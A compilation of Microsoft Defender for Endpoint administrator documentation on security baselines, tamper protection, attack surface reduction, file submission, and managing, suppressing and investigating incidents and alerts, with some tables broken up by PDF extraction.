Windows security baseline settings for Intune

Microsoft Defender for Endpoint baseline settings for Intune
Ideally, devices onboarded to Defender for Endpoint are deployed both baselines: the
Windows Intune security baseline to initially secure Windows and then the Defender for
Endpoint security baseline layered on top to optimally configure the Defender for
Endpoint security controls. To benefit from the latest data on risks and threats and to
minimize conflicts as baselines evolve, always apply the latest versions of the baselines
across all products as soon as they're released.
７ Note
The Defender for Endpoint security baseline has been optimized for physical
devices and is currently not recommended for use on virtual machine (VMs) or VDI
endpoints. Certain baseline settings can impact remote interactive sessions on
virtualized environments.
Monitor compliance to the Defender for

Endpoint security baseline
The Security baseline card on device configuration management provides an overview
of compliance across Windows 10 and Windows 11 devices that have been assigned the
Defender for Endpoint security baseline.
Card showing compliance to the Defender for Endpoint security baseline
Each device is given one of the following status types:

Matches baseline: Device settings match all the settings in the baseline.
Does not match baseline: At least one device setting doesn't match the baseline.
Misconfigured: At least one baseline setting isn't properly configured on the
device and is in a conflict, error, or pending state.
Not applicable: At least one baseline setting isn't applicable on the device.
To review specific devices, select Configure security baseline on the card. This takes you
to Intune device management. From there, select Device status for the names and
statuses of the devices.
７ Note
You might experience discrepancies in aggregated data displayed on the device

configuration management page and those displayed on overview screens in
Intune.
Review and assign the Microsoft Defender for

Endpoint security baseline
Device configuration management monitors baseline compliance only of Windows 10
and Windows 11 devices that have been specifically assigned the Microsoft Defender for
Endpoint security baseline. You can conveniently review the baseline and assign it to
devices on Intune device management.
1. Select Configure security baseline on the Security baseline card to go to Intune

device management. A similar overview of baseline compliance is displayed.
 Tip
Alternatively, you can navigate to the Defender for Endpoint security baseline
in the Microsoft Azure portal from All services > Intune > Device security >
Security baselines > Microsoft Defender ATP baseline.
2. Create a new profile.


Microsoft Defender for Endpoint security baseline overview on Intune
3. During profile creation, you can review and adjust specific settings on the baseline.

Security baseline options during profile creation on Intune
4. Assign the profile to the appropriate device group.


Assigning the security baseline profile on Intune
5. Create the profile to save it and deploy it to the assigned device group.
Creating the security baseline profile on Intune
 Tip
Security baselines on Intune provide a convenient way to comprehensively secure
and protect your devices. Learn more about security baselines on Intune.
Related articles
Get devices onboarded to Microsoft Defender for Endpoint
 Tip
Feedback

Optimize ASR rule deployment and
detections
Article • 11/15/2023
Applies to:

Attack surface reduction rules identify and prevent typical malware exploits. They
control when and how potentially malicious code can run. For example, they can prevent
JavaScript or VBScript from launching a downloaded executable, block Win32 API calls
from Office macros, and block processes that run from USB drives.

Attack surface management card
The Attack surface management card is an entry point to tools in Microsoft Defender
portal that you can use to:
Understand how ASR rules are currently deployed in your organization.

Review ASR detections and identify possible incorrect detections.
Analyze the impact of exclusions and generate the list of file paths to exclude.
Select Go to attack surface management > Reports > Attack surface reduction rules >
Add exclusions. From there, you can navigate to other sections of Microsoft Defender
portal.

The Add exclusions tab in the Attack surface reduction rules page in Microsoft
Defender portal
７ Note
To access Microsoft Defender portal, you need a Microsoft 365 E3 or E5 license and
an account that has certain roles on Microsoft Entra ID. Read about required
licenses and permissions.
For more information about ASR rule deployment in Microsoft Defender portal , see
Optimize ASR rule deployment and detections.
Related topics
Get devices onboarded to Microsoft Defender for Endpoint
Monitor compliance to the Microsoft Defender for Endpoint security baseline
 Tip
Feedback

Built-in protection helps guard against
ransomware
Article • 06/06/2023
Applies to:

Microsoft Defender for Endpoint helps prevent, detect, investigate, and respond to
advanced threats, such as ransomware attacks. Next-generation protection and attack
surface reduction capabilities in Defender for Endpoint were designed to catch
emerging threats. In order for the best protection from ransomware and other
cyberthreats to be in place, certain settings must be configured. Built-in protection can
help by providing you with default settings for better protection.
 Tip
You don't have to wait for built-in protection to come to you! You can protect
your organization's devices now by configuring these capabilities:
Enable cloud protection

Turn tamper protection on
Set standard attack surface reduction rules to block mode
Enable network protection in block mode
What is built-in protection, and how does it

work?
Built-in protection is a set of default settings that are rolling out to help ensure your
devices are protected. These default settings are designed to protect devices from
ransomware and other threats. Initially, built-in protection includes turning tamper
protection on for your tenant, with other default settings coming soon. For more
information, see the Tech Community blog post, Tamper protection will be turned on for
all enterprise customers .
ﾉ Expand table
Phase What happens
Built-in protection is Customers are receiving notification that built-in protection is coming. If
rolling out it's not already configured, tamper protection is turned on for
customers who have Defender for Endpoint Plan 2 or Microsoft 365 E5.
Built-in protection You'll be notified that your tenant is about to receive built-in protection
becomes available for and when tamper protection will be turned on (if it's not already
your tenant configured).
Built-in protection Tamper protection is turned on for your tenant, and is applied to your
arrives organization's Windows devices. You can opt out or change your built-
in protection settings.
After built-in Whenever new devices are onboarded to Defender for Endpoint, built-in
protection has arrived protection settings are applied to any new devices running Windows.
You can always change your built-in protection settings.
７ Note
Built-in protection sets default values for Windows and Mac devices. If endpoint
security settings change, such as through baselines or policies in Microsoft Intune,
those settings override the built-in protection settings.
What does the notification look like?

You can expect to receive two types of notifications:
A message center post indicating that built-in protection is coming soon; and
A banner in the Microsoft Defender portal that resembles the following image:
Your notification tells you when built-in protection is coming and when tamper
protection will be turned on (if it's not already configured) for your tenant.
Can I opt out?

You can opt out of built-in protection by specifying your own security settings. For
example, if you prefer to not have tamper protection turned on automatically for your
tenant, you can explicitly opt out.
Ｕ Caution
We do not recommend turning tamper protection off. Tamper protection provides

you with better ransomware protection. You must be a global administrator or
security administrator to perform the following procedure.
2. Go to Settings > Endpoints > Advanced features.
3. Set Tamper protection to On (if it's not already on), and then select Save
preferences. Don't leave this page yet.
4. Set Tamper protection to Off, and then select Save preferences.
Can I change built-in protection settings?

Built-in protection is a set of default settings. You aren't required to keep these default
settings in place. You can always change your settings to suit your business needs. The
following table lists tasks your security team might perform, along with links to learn
more.
ﾉ Expand table
Task Description
Determine whether tamper protection is 1. Go to the Microsoft Defender portal

turned on for your organization (https://security.microsoft.com ) and sign in.
2. Go to Settings > Endpoints > Advanced features >

Tamper protection.
Manage tamper protection tenant wide 1. Go to the Microsoft Defender portal

using the Microsoft Defender portal (https://security.microsoft.com ) and sign in.
(https://security.microsoft.com )
2. Go to Settings > Endpoints > Advanced features.
3. Set Tamper protection to On (recommended) or

Off.
4. Select Save preferences.
See Manage tamper protection for your organization

using Microsoft Defender portal.
Set tamper protection settings for some, Use endpoint security policies and profiles that are
but not all, devices applied to specific devices.

- Manage tamper protection using Microsoft Intune
- Manage tamper protection using tenant attach with
Configuration Manager, version 2006
Turn tamper protection on or off on an 1. On your Windows device, select Start, and start
individual Windows device typing Security.
2. In the search results, select Windows Security.
3. Select Virus & threat protection > Virus & threat

protection settings.
4. Set Tamper Protection to On (recommended) or

Off.
If the device is onboarded to Defender for Endpoint,

or the device is managed in the Microsoft Intune
Task Description
admin center, those settings will override user

settings on the individual device. See Manage tamper
protection on an individual device.
Turn tamper protection on or off 1. On your Mac, open Finder, and go to Applications
manually on a Mac > Utilities > Terminal.
2. In Terminal, type the following command sudo

mdatp config tamper-protection enforcement-level --
value (chosen mode) .
See Manual configuration.
Change tamper protection settings using To change the tamper protection mode using an
a Mobile Device Management (MDM) MDM, go to the configuration profile and change the
solution enforcement level in Intune or JAMF.
The configuration profile set with the MDM will be

your first point of reference. Any settings defined in
the profile will be enforced on the device, and built-
in-protection default settings won't override these
applied settings.
Temporarily disable tamper protection See the following articles:

on a device for troubleshooting - Get started with troubleshooting mode in Microsoft
purposes Defender for Endpoint
- Troubleshooting mode scenarios in Microsoft
See also
Tech Community blog: Tamper protection will be turned on for all enterprise
customers
Manage endpoint security in Microsoft Intune
Configure Microsoft Defender for Endpoint in Intune
Responding to ransomware attacks
 Tip
Feedback

Overview of endpoint detection and
response
Article • 10/09/2023
Applies to:

Endpoint detection and response capabilities in Defender for Endpoint provide

advanced attack detections that are near real-time and actionable. Security analysts can
prioritize alerts effectively, gain visibility into the full scope of a breach, and take
response actions to remediate threats.
When a threat is detected, alerts are created in the system for an analyst to investigate.
Alerts with the same attack techniques or attributed to the same attacker are
aggregated into an entity called an incident. Aggregating alerts in this manner makes it
easy for analysts to collectively investigate and respond to threats.
７ Note
Defender for Endpoint detection is not intended to be an auditing or logging

solution that records every operation or activity that happens on a given endpoint.
Our sensor has an internal throttling mechanism, so the high rate of repeat
identical events don't flood the logs.
） Important
Defender for Endpoint Plan 1 and Microsoft Defender for Business include only
the following manual response actions:
Run antivirus scan

Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file
Inspired by the "assume breach" mindset, Defender for Endpoint continuously collects
behavioral cyber telemetry. This includes process information, network activities, deep
optics into the kernel and memory manager, user login activities, registry and file system
changes, and others. The information is stored for six months, enabling an analyst to
travel back in time to the start of an attack. The analyst can then pivot in various views
and approach an investigation through multiple vectors.
The response capabilities give you the power to promptly remediate threats by acting
on the affected entities.
See also
Incidents queue
Alerts queue
Devices list
 Tip
Feedback

Submit files in Microsoft Defender for
Endpoint
Article • 02/15/2024
Applies to

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial .
In Microsoft Defender for Endpoint, admins can use the unified submissions feature to
submit files and file hashes (SHAs) to Microsoft for review. The unified submissions
experience is a one-stop shop for submitting emails, URLs, email attachments, and files
in one, easy-to-use submission experience. Admins can use the Microsoft Defender
portal or the Microsoft Defender for Endpoint Alert page to submit suspicious files.

The new unified submissions experience is available only in subscriptions that include
Microsoft Defender for Endpoint Plan 2. You need to assign permissions before you can
perform the procedures in this article. Use one of the following options:
Microsoft Defender for Endpoint permissions:
Submit files / file hashes: "Alerts investigation" or "Manage security settings in

Security Center"
View submissions: "View Data - Security operations"
Microsoft Defender XDR unified RBAC permissions:
Submit files / file hashes: "Alerts (Manage)" or "Core security settings (manage)"
View submissions: "Security data basics (read)"
For more information about how you can submit spam, phish, URLs, and email
attachments to Microsoft, see Use the Submissions page to submit suspected spam,
phish, URLs, legitimate email getting blocked, and email attachments to Microsoft.
Submit a file or file hash to Microsoft from the

Defender portal
1. In the Microsoft Defender portal at https://security.microsoft.com , go to Actions
& submissions > Submissions. Or, to go directly to the Submissions page, use
https://security.microsoft.com/reportsubmission .
2. On the Submissions page, select the Files tab.
3. On the Files tab, select Add new submission.
4. In the Submit items to Microsoft for review flyout that opens, select Files or File
hash from the Select the submission type dropdown list.
If you selected Files, configure the following options:

Select Browse files. In the dialog that opens, find and select the file, and
then select Open. Repeat this step as many times as necessary. To remove
an entry from the flyout, select next to the entry.
The maximum total size of all files is 500 MB.
Use the password 'infected' to encrypt archive files.
The file should have been categorized as: Select one of the following
values:
Malware (false negative)
Unwanted software
Clean (false positive)
Choose the priority: Select one of the following values:
Low - bulk file or file hash submission
Medium - standard submission
High - needs immediate attention (max three per day)
Notes for Microsoft (optional): Enter an optional note.
Share feedback and relevant content with Microsoft: Read the privacy
statement and then select this option.
If you selected File hash, configure the following options:
In the empty box, enter the file hash value (for example,
2725eb73741e23a254404cc6b5a54d9511b9923be2045056075542ca1bfbf3fe ) and
then press the ENTER key. Repeat this step as many times as necessary. To
remove an entry from the flyout, select next to the entry.
The file should have been categorized as: Select one of the following
values:
Malware (false negative)
Unwanted software
Clean (false positive)
Notes for Microsoft (optional): Enter an optional note.
Share feedback and relevant content with Microsoft: Read the privacy
statement and then select this option.
When you're finished in the Submit items to Microsoft for review flyout, select
Submit.
Back on the Files tab of the Submissions page, the submission is shown.
To view the details of the submission, select the submission by clicking anywhere in the
row other than the check box next to the Submission name. The details of the
submission are in the details flyout that opens.
Report items to Microsoft from the Alerts page

in the Defender portal
1. In the Microsoft Defender portal at https://security.microsoft.com , go to
Incidents & alerts > Alerts. Or, to go directly to the Alerts page, use
https://security.microsoft.com/alerts .
2. On the Alerts page, find the alert that contains the file you want to report. For
example, you can select Filter, and then select Service sources > Microsoft
3. Select the alert from the list by clicking anywhere in the row other than the check
box next to the Alert name value.
4. In the details flyout that opens, select > Submit items to Microsoft for review.
5. The options that are available in the Submit items to Microsoft for review flyout
that opens are basically same as described in the previous section.
The only difference is an Include alert story option that you can select to attach a
JSON file that helps Microsoft investigate the submission.
When you're finished in the Submit items to Microsoft for review flyout, select
Submit.
The submission is available on the Files tab of the Submissions page at

https://security.microsoft.com/reportsubmission?viewid=file .
Related information
Microsoft Defender for Endpoint in Microsoft Defender XDR
Address false positives/negatives
View and organize alerts queue in Microsoft Defender for Endpoint
 Tip
Feedback

View and organize the Microsoft
Defender for Endpoint Incidents queue
Article • 01/24/2024
Applies to:

 Tip
For a limited time during January 2024, when you visit the Incidents page,
Defender Boxed appears. Defender Boxed highlights your organization's security
successes, improvements, and response actions during 2023. To reopen Defender
Boxed, in the Microsoft Defender portal, go to Incidents, and then select Your
Defender Boxed.
The Incidents queue shows a collection of incidents that were flagged from devices in
your network. It helps you sort through incidents to prioritize and create an informed
cybersecurity response decision.
By default, the queue displays incidents seen in the last 6 months, with the most recent
incident showing at the top of the list, helping you see the most recent incidents first.
There are several options you can choose from to customize the Incidents queue view.
On the top navigation you can:
Customize columns to add or remove columns

Modify the number of items to view per page
Select the items to show per page
Batch-select the incidents to assign
Navigate between pages
Apply filters
Customize and apply date ranges

Sort and filter the incidents queue

You can apply the following filters to limit the list of incidents and get a more focused
view.
Severity
ﾉ Expand table
Incident Description
severity
High Threats often associated with advanced persistent threats (APT). These incidents
(Red) indicate a high risk due to the severity of damage they can inflict on devices.
Medium Threats rarely observed in the organization, such as anomalous registry change,
(Orange) execution of suspicious files, and observed behaviors typical of attack stages.
Low Threats associated with prevalent malware and hack-tools that do not
(Yellow) necessarily indicate an advanced threat targeting the organization.
Informational Informational incidents might not be considered harmful to the network but
(Grey) might be good to keep track of.
Assigned to
You can choose to filter the list by selecting assigned to anyone or ones that are
assigned to you.
Category
Incidents are categorized based on the description of the stage by which the
cybersecurity kill chain is in. This view helps the threat analyst to determine priority,
urgency, and corresponding response strategy to deploy based on context.
Status
You can choose to limit the list of incidents shown based on their status to see which
ones are active or resolved.
Data sensitivity
Use this filter to show incidents that contain sensitivity labels.
Incident naming
To understand the incident's scope at a glance, incident names are automatically
generated based on alert attributes such as the number of endpoints affected, users
affected, detection sources or categories.
For example: Multi-stage incident on multiple endpoints reported by multiple sources.
７ Note
Incidents that existed prior the rollout of automatic incident naming will retain their
name.
See also
Incidents queue
Manage incidents
Investigate incidents
 Tip
Feedback

Endpoint incidents
Article • 01/24/2024
Applies to:

Managing incidents is an important part of every cybersecurity operation. You can

manage incidents by selecting an incident from the Incidents queue or the Incidents
management pane.
 Tip
Defender Boxed.
Selecting an incident from the Incidents queue brings up the Incident management
pane where you can open the incident page for details.

You can assign incidents to yourself, change the status and classification, rename, or
comment on them to keep track of their progress.
 Tip
For additional visibility at a glance, incident names are automatically generated

based on alert attributes such as the number of endpoints affected, users affected,
detection sources or categories. This allows you to quickly understand the scope of
the incident.
For example: Multi-stage incident on multiple endpoints reported by multiple sources.
Incidents that existed prior the rollout of automatic incident naming will retain their
names.
Assign incidents
If an incident has not been assigned yet, you can select Assign to me to assign the
incident to yourself. Doing so assumes ownership of not just the incident, but also all
the alerts associated with it.
Set status and classification
Incident status
You can categorize incidents (as Active, or Resolved) by changing their status as your
investigation progresses. This helps you organize and manage how your team can
respond to incidents.
For example, your SOC analyst can review the urgent Active incidents for the day, and
decide to assign them to himself for investigation.
Alternatively, your SOC analyst might set the incident as Resolved if the incident has
been remediated.
Classification
You can choose not to set a classification, or decide to specify whether an incident is
true or false. Doing so helps the team see patterns and learn from them.
Add comments
You can add comments and view historical events about an incident to see previous
changes made to it.
Whenever a change or comment is made to an alert, it is recorded in the Comments and

history section.
Added comments instantly appear on the pane.
Related topics
Incidents queue
View and organize the Incidents queue
 Tip
Feedback
Investigate incidents in Microsoft
Article • 01/24/2024
Applies to:

Investigate incidents that affect your network, understand what they mean, and collate
evidence to resolve them.
When you investigate an incident, you'll see:
Incident details
Incident comments and actions
Tabs (alerts, devices, investigations, evidence, graph)
https://www.microsoft.com/en-us/videoplayer/embed/RE4qLUV?postJsllMsg=true
Analyze incident details
 Tip
Defender Boxed.
Click an incident to see the Incident pane. Select Open incident page to see the
incident details and related information (alerts, devices, investigations, evidence, graph).

Alerts
You can investigate the alerts and see how they were linked together in an incident.
Alerts are grouped into incidents based on the following reasons:
Automated investigation - The automated investigation triggered the linked alert

while investigating the original alert
File characteristics - The files associated with the alert have similar characteristics
Manual association - A user manually linked the alerts
Proximate time - The alerts were triggered on the same device within a certain
timeframe
Same file - The files associated with the alert are exactly the same
Same URL - The URL that triggered the alert is exactly the same

You can also manage an alert and see alert metadata along with other information. For
more information, see Investigate alerts.
Devices
You can also investigate the devices that are part of, or related to, a given incident. For
more information, see Investigate devices.
Investigations
Select Investigations to see all the automatic investigations launched by the system in
response to the incident alerts.
Going through the evidence

Microsoft Defender for Endpoint automatically investigates all the incidents' supported
events and suspicious entities in the alerts, providing you with autoresponse and
information about the important files, processes, services, and more.
Each of the analyzed entities will be marked as infected, remediated, or suspicious.
Visualizing associated cybersecurity threats

Microsoft Defender for Endpoint aggregates the threat information into an incident so
you can see the patterns and correlations coming in from various data points. You can
view such correlation through the incident graph.
Incident graph
The Graph tells the story of the cybersecurity attack. For example, it shows you what was
the entry point, which indicator of compromise or activity was observed on which
device. etc.
You can click the circles on the incident graph to view the details of the malicious files,
associated file detections, how many instances have there been worldwide, whether it's
been observed in your organization, if so, how many instances.

Related topics
Incidents queue
Investigate incidents in Microsoft Defender for Endpoint
Manage Microsoft Defender for Endpoint incidents
 Tip
Feedback

Alerts queue in Microsoft Defender XDR
Article • 02/15/2024
Applies to:

Learn how you can view and manage the queue so that you can effectively investigate
threats seen on entities such as devices, files, or user accounts.
In this section
ﾉ Expand table
Topic Description
View and organize the Shows a list of alerts that were flagged in your network.
Alerts queue
Manage alerts Learn about how you can manage alerts such as change its status, assign
it to a security operations member, and see the history of an alert.
Investigate alerts Investigate alerts that are affecting your network, understand what they
mean, and how to resolve them.
Investigate files Investigate the details of a file associated with a specific alert, behavior,
or event.
Investigate devices Investigate the details of a device associated with a specific alert,
behavior, or event.
Investigate an IP Examine possible communication between devices in your network and

address external internet protocol (IP) addresses.
Investigate a domain Investigate a domain to see if devices and servers in your network have
been communicating with a known malicious domain.
Investigate a user Identify user accounts with the most active alerts and investigate cases of
account potential compromised credentials.
 Tip
Feedback

View and organize the Microsoft
Defender for Endpoint Alerts queue
Article • 02/15/2024
Applies to:
The Alerts queue shows a list of alerts that were flagged from devices in your network.
By default, the queue displays alerts seen in the last 7 days in a grouped view. The most
recent alerts are shown at the top of the list helping you see the most recent alerts first.
７ Note
The alerts are significantly reduced with automated investigation and remediation,
allowing security operations experts to focus on more sophisticated threats and
other high value initiatives. When an alert contains a supported entity for
automated investigation (for example, a file) in a device that has a supported
operating system for it, an automated investigation and remediation can start. For
more information on automated investigations, see Overview of Automated
investigations.
There are several options you can choose from to customize the alerts view.
On the top navigation you can:
Customize columns to add or remove columns

Apply filters
Display the alerts for a particular duration like 1 Day, 3 Days, 1 Week, 30 Days, and
6 Months
Export the alerts list to excel
Manage Alerts

Sort and filter alerts

You can apply the following filters to limit the list of alerts and get a more focused view
of the alerts.
Severity
ﾉ Expand table
Alert Description
severity
High Alerts commonly seen associated with advanced persistent threats (APT). These
(Red) alerts indicate a high risk because of the severity of damage they can inflict on
devices. Some examples are: credential theft tools activities, ransomware activities
not associated with any group, tampering with security sensors, or any malicious
activities indicative of a human adversary.
Medium Alerts from endpoint detection and response post-breach behaviors that might
(Orange) be a part of an advanced persistent threat (APT). These behaviors include
observed behaviors typical of attack stages, anomalous registry change, execution
of suspicious files, and so forth. Although some might be part of internal security
testing, it requires investigation as it might also be a part of an advanced attack.
Low Alerts on threats associated with prevalent malware. For example, hack-tools,
(Yellow) non-malware hack tools, such as running exploration commands, clearing logs,
etc., that often do not indicate an advanced threat targeting the organization. It
could also come from an isolated security tool testing by a user in your
organization.
Informational Alerts that might not be considered harmful to the network but can drive
(Grey) organizational security awareness on potential security issues.
Understanding alert severity

Microsoft Defender Antivirus and Defender for Endpoint alert severities are different
because they represent different scopes.
The Microsoft Defender Antivirus threat severity represents the absolute severity of the
detected threat (malware), and is assigned based on the potential risk to the individual
device, if infected.
The Defender for Endpoint alert severity represents the severity of the detected
behavior, the actual risk to the device but more importantly the potential risk to the
organization.
So, for example:
The severity of a Defender for Endpoint alert about a Microsoft Defender Antivirus
detected threat that was prevented and did not infect the device is categorized as
"Informational" because there was no actual damage.
An alert about a commercial malware was detected while executing, but blocked
and remediated by Microsoft Defender Antivirus, is categorized as "Low" because
it may have caused some damage to the individual device but poses no
organizational threat.
An alert about malware detected while executing which can pose a threat not only
to the individual device but to the organization, regardless if it was eventually
blocked, may be ranked as "Medium" or "High".
Suspicious behavioral alerts, which weren't blocked or remediated will be ranked
"Low", "Medium" or "High" following the same organizational threat
considerations.
Status
You can choose to filter the list of alerts based on their Status.
７ Note
If you see an Unsupported alert type alert status, it means that automated
investigation capabilities cannot pick up that alert to run an automated
investigation. However, you can investigate these alerts manually.
Categories
We've redefined the alert categories to align to the enterprise attack tactics in the
MITRE ATT&CK matrix . New category names apply to all new alerts. Existing alerts will
keep the previous category names.
Service sources
You can filter the alerts based on the following Service sources:

App Governance
Microsoft Entra ID Protection
Microsoft Endpoint Notification customers can now filter and see detections from the
service by filtering by Microsoft Defender Experts nested under the Microsoft Defender for
Endpoint service source.
７ Note
The Antivirus filter will only appear if devices are using Microsoft Defender Antivirus
as the default real-time protection antimalware product.
Tags
You can filter the alerts based on Tags assigned to alerts.
Policy
You can filter the alerts based on the following policies:
ﾉ Expand table
Detection source API value
Third-party sensors ThirdPartySensors
Antivirus WindowsDefenderAv
Automated investigation AutomatedInvestigation
Custom detection CustomDetection

Detection source API value
Custom TI CustomerTI
EDR WindowsDefenderAtp
Microsoft Defender XDR MTP
Microsoft Defender for Office 365 OfficeATP
Microsoft Defender Experts ThreatExperts
SmartScreen WindowsDefenderSmartScreen
Entities
You can filter the alerts based on Entity name or ID.
Automated investigation state

You can choose to filter the alerts based on their Automated investigation state.
Related topics
Manage Microsoft Defender for Endpoint alerts
Investigate Microsoft Defender for Endpoint alerts
Investigate a file associated with a Microsoft Defender for Endpoint alert
Investigate an IP address associated with a Microsoft Defender for Endpoint alert
Investigate a domain associated with a Microsoft Defender for Endpoint alert
Investigate a user account in Microsoft Defender for Endpoint
 Tip
Feedback
Review alerts in Microsoft Defender for
Endpoint
Article • 07/18/2023
Applies to:

The alert page in Microsoft Defender for Endpoint provides full context to the alert, by
combining attack signals and alerts related to the selected alert, to construct a detailed
alert story.
Quickly triage, investigate, and take effective action on alerts that affect your
organization. Understand why they were triggered, and their impact from one location.
Learn more in this overview.
https://www.microsoft.com/en-us/videoplayer/embed/RE4yiO5?postJsllMsg=true
Getting started with an alert

Selecting an alert's name in Defender for Endpoint will land you on its alert page. On the
alert page, all the information will be shown in context of the selected alert. Each alert
page consists of 4 sections:
1. The alert title shows the alert's name and is there to remind you which alert
started your current investigation regardless of what you have selected on the
page.
2. Affected assets lists cards of devices and users affected by this alert that are
clickable for further information and actions.
3. The alert story displays all entities related to the alert, interconnected by a tree
view. The alert in the title will be the one in focus when you first land on your
selected alert's page. Entities in the alert story are expandable and clickable, to
provide additional information and expedite response by allowing you to take
actions right in the context of the alert page. Use the alert story to start your
investigation. Learn how in Investigate alerts in Microsoft Defender for Endpoint.
4. The details pane will show the details of the selected alert at first, with details and
actions related to this alert. If you select any of the affected assets or entities in the
alert story, the details pane will change to provide contextual information and
actions for the selected object.
Note the detection status for your alert.
Prevented: The attempted suspicious action was avoided. For example, a file either
wasn't written to disk or executed.
Blocked: Suspicious behavior was executed and then blocked. For example, a
process was executed but because it subsequently exhibited suspicious behaviors,
the process was terminated.
Detected: An attack was detected and is possibly still active.


You can then also review the automated investigation details in your alert's details pane,
to see which actions were already taken, as well as reading the alert's description for
recommended actions.

Other information available in the details pane when the alert opens includes MITRE
techniques, source, and additional contextual details.
７ Note
If you see an Unsupported alert type alert status, it means that automated
investigation capabilities cannot pick up that alert to run an automated
investigation. However, you can investigate these alerts manually.
Review affected assets

Selecting a device or a user card in the affected assets sections will switch to the details
of the device or user in the details pane.
For devices, the details pane will display information about the device itself, like
Domain, Operating System, and IP. Active alerts and the logged on users on that
device are also available. You can take immediate action by isolating the device,
restricting app execution, or running an antivirus scan. Alternatively, you could
collect an investigation package, initiate an automated investigation, or go to the
device page to investigate from the device's point of view.

For users, the details pane will display detailed user information, such as the user's
SAM name and SID, as well as logon types performed by this user and any alerts
and incidents related to it. You can select Open user page to continue the
investigation from that user's point of view.

Related topics
View and organize the incidents queue
Manage incidents
 Tip
Feedback

Endpoint alerts
Article • 02/07/2023
Applies to:

Defender for Endpoint notifies you of possible malicious events, attributes, and
contextual information through alerts. A summary of new alerts is displayed and you can
access all alerts in the Alerts queue.
You can manage alerts by selecting an alert in the Alerts queue, or the Alerts tab of the
Device page for an individual device.
Selecting an alert in either of those places brings up the Alert management pane.
Watch this video to learn how to use the new Microsoft Defender for Endpoint alert
page.
https://www.microsoft.com/en-us/videoplayer/embed/RE4yiO5?postJsllMsg=true
Link to another incident

You can create a new incident from the alert or link to an existing incident.
Assign alerts
If an alert is not yet assigned, you can select Assign to me to assign the alert to yourself.
Suppress alerts
There might be scenarios where you need to suppress alerts from appearing in
Microsoft Defender XDR. Defender for Endpoint lets you create suppression rules for
specific alerts that are known to be innocuous such as known tools or processes in your
organization.
Suppression rules can be created from an existing alert. They can be disabled and
reenabled if needed.
When a suppression rule is created, it will take effect from the point when the rule is
created. The rule will not affect existing alerts already in the queue, prior to the rule
creation. The rule will only be applied on alerts that satisfy the conditions set after the
rule is created.
There are two contexts for a suppression rule that you can choose from:
Suppress alert on this device

Suppress alert in my organization
The context of the rule lets you tailor what gets surfaced into the portal and ensure that
only real security alerts are surfaced into the portal.
You can use the examples in the following table to help you choose the context for a
suppression rule:
ﾉ Expand table
Context Definition Example scenarios
Suppress alert on Alerts with the same alert A security researcher is investigating a
this device title and on that specific malicious script that has been used to
device only will be attack other devices in your
suppressed. organization.
All other alerts on that A developer regularly creates
device will not be PowerShell scripts for their team.
suppressed.
Context Definition Example scenarios
Suppress alert in Alerts with the same alert A benign administrative tool is used by
my organization title on any device will be everyone in your organization.
suppressed.
Suppress an alert and create a new suppression rule

Create custom rules to control when alerts are suppressed, or resolved. You can control
the context for when an alert is suppressed by specifying the alert title, Indicator of
compromise, and the conditions. After specifying the context, you'll be able to configure
the action and scope on the alert.
1. Select the alert you'd like to suppress. This brings up the Alert management pane.
2. Select Create a suppression rule.
You can create a suppression condition using these attributes. An AND operator is
applied between each condition, so suppression occurs only if all conditions are
met.
File SHA1
File name - wildcard supported
Folder path - wildcard supported
IP address
URL - wildcard supported
Command line - wildcard supported
3. Select the Triggering IOC.
4. Specify the action and scope on the alert.
You can automatically resolve an alert or hide it from the portal. Alerts that are
automatically resolved will appear in the resolved section of the alerts queue, alert
page, and device timeline and will appear as resolved across Defender for Endpoint
APIs.
Alerts that are marked as hidden will be suppressed from the entire system, both
on the device's associated alerts and from the dashboard and will not be streamed
across Defender for Endpoint APIs.
5. Enter a rule name and a comment.
6. Click Save.
View the list of suppression rules
2. The list of suppression rules shows all the rules that users in your organization
have created.
For more information on managing suppression rules, see Manage suppression rules
Change the status of an alert

You can categorize alerts (as New, In Progress, or Resolved) by changing their status as
your investigation progresses. This helps you organize and manage how your team can
respond to alerts.
For example, a team leader can review all New alerts, and decide to assign them to the
In Progress queue for further analysis.
Alternatively, the team leader might assign the alert to the Resolved queue if they know
the alert is benign, coming from a device that is irrelevant (such as one belonging to a
security administrator), or is being dealt with through an earlier alert.
Alert classification
You can choose not to set a classification, or specify whether an alert is a true alert or a
false alert. It's important to provide the classification of true positive/false positive. This
classification is used to monitor alert quality, and make alerts more accurate. The
"determination" field defines additional fidelity for a "true positive" classification.
The steps to classify alerts are included in this video:

https://www.microsoft.com/en-us/videoplayer/embed/RE4LHJq?postJsllMsg=true
Add comments and view the history of an alert

You can add comments and view historical events about an alert to see previous
changes made to the alert.
Whenever a change or comment is made to an alert, it is recorded in the Comments

and history section.
Added comments instantly appear on the pane.

Related articles
View and organize the Microsoft Defender for Endpoint Alerts queue
 Tip
Feedback

Investigate alerts in Microsoft Defender
for Endpoint
Article • 07/18/2023
Applies to:

Investigate alerts that are affecting your network, understand what they mean, and how
to resolve them.
Select an alert from the alerts queue to go to alert page. This view contains the alert
title, the affected assets, the details side pane, and the alert story.
From the alert page, begin your investigation by selecting the affected assets or any of
the entities under the alert story tree view. The details pane automatically populates
with further information about what you selected. To see what kind of information you
can view here, read Review alerts in Microsoft Defender for Endpoint.
Investigate using the alert story

The alert story details why the alert was triggered, related events that happened before
and after, as well as other related entities.
Entities are clickable and every entity that isn't an alert is expandable using the expand
icon on the right side of that entity's card. The entity in focus will be indicated by a blue
stripe to the left side of that entity's card, with the alert in the title being in focus at first.
Expand entities to view details at a glance. Selecting an entity will switch the context of
the details pane to this entity, and will allow you to review further information, as well as
manage that entity. Selecting ... to the right of the entity card will reveal all actions
available for that entity. These same actions appear in the details pane when that entity
is in focus.
７ Note
The alert story section may contain more than one alert, with additional alerts
related to the same execution tree appearing before or after the alert you've
selected.
Take action from the details pane

Once you've selected an entity of interest, the details pane will change to display
information about the selected entity type, historic information when it's available, and
offer controls to take action on this entity directly from the alert page.
Once you're done investigating, go back to the alert you started with, mark the alert's
status as Resolved and classify it as either False alert or True alert. Classifying alerts
helps tune this capability to provide more true alerts and less false alerts.
If you classify it as a true alert, you can also select a determination, as shown in the
image below.

If you are experiencing a false alert with a line-of-business application, create a

suppression rule to avoid this type of alert in the future.
 Tip
If you're experiencing any issues not described above, use the 🙂 button to
provide feedback or open a support ticket.
Related topics
Investigate a file associated with a Defender for Endpoint alert
Investigate devices in the Defender for Endpoint Devices list
Investigate an IP address associated with a Defender for Endpoint alert
Investigate a domain associated with a Defender for Endpoint alert
Investigate a user account in Defender for Endpoint
